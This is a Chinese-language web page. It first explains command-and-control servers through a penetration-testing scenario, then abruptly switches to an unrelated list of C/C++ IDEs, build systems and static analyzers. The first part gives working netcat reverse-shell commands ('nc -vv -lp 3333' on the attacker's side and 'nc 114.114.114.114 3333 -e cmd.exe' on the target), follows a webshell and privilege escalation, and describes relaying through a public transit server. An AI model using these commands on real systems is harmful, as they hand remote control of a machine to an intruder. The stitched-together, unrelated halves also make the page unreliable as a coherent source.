什么是C&C服务器

C&C 服务器的全称是 Command and Control Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个 webshell 的时候，需要对服务器进行提权操作，如果是一台 windows 的服务器，提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权，有些 exp 可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的 exp 溢出成功之后是返回一个 system 权限的 cmd，这时就需要将低权限的 cmd shell 反弹回本地，这里用 nc 在本地执行：nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接，假设电脑 IP 是公网的，并且 IP 为 114.114.114.114，然后在目标服务器就可以执行：nc 114.114.114.114 3333 -e cmd.exe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地，这时你就可以通过 nc 建立的这个 shell 进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的 C&C 服务器。

扩展资料：

C&C 服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网 IP 地址是：111.111.111.111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

AppCode ：构建与JetBrains’ IntelliJ IDEA 平台上的用于Objective-C，C,C++，Java和Java开发的集成开发环境

CLion：来自JetBrains的跨平台的C/C++的集成开发环境

Code::Blocks ：免费C，C++和Fortran的集成开发环境

CodeLite ：另一个跨平台的免费的C/C++集成开发环境

Dev-C++：可移植的C/C++/C++11集成开发环境

Eclipse CDT：基于Eclipse平台的功能齐全的C和C++集成开发环境

Geany ：轻量级的快速，跨平台的集成开发环境。

IBM VisualAge ：来自IBM的家庭计算机集成开发环境。

Irony-mode：由libclang驱动的用于Emacs的C/C++微模式

KDevelop：免费开源集成开发环境

Microsoft Visual Studio ：来自微软的集成开发环境

NetBeans ：主要用于Java开发的的集成开发环境，也支持其他语言，尤其是PHP，C/C++和HTML5。

Qt Creator：跨平台的C++，Javascript和QML集成开发环境，也是Qt SDK的一部分。

rtags：C/C++的客户端服务器索引，用于 跟基于clang的emacs的集成

Xcode ：由苹果公司开发

YouCompleteMe：一个用于Vim的根据你敲的代码快速模糊搜索并进行代码补全的引擎。

构建系统

Bear ：用于为clang工具生成编译数据库的工具

Biicode：基于文件的简单依赖管理器。

CMake ：跨平台的免费开源软件用于管理软件使用独立编译的方法进行构建的过程。

CPM：基于CMake和Git的C++包管理器

FASTBuild：高性能，开源的构建系统，支持高度可扩展性的编译，缓冲和网络分布。

Ninja ：专注于速度的小型构建系统

Scons ：使用Python scipt 配置的软件构建工具

tundra ：高性能的代码构建系统，甚至对于非常大型的软件项目，也能提供最好的增量构建次数。

tup：基于文件的构建系统，用于后台监控变化的文件。

静态代码分析

提高质量，减少瑕疵的代码分析工具列表

Cppcheck ：静态C/C++代码分析工具

include-what-you-use ：使用clang进行代码分析的工具，可以#include在C和C++文件中。

OCLint ：用于C，C++和Objective-C的静态源代码分析工具，用于提高质量，减少瑕疵。

Clang Static Analyzer：查找C，C++和Objective-C程序bug的源代码分析工具

---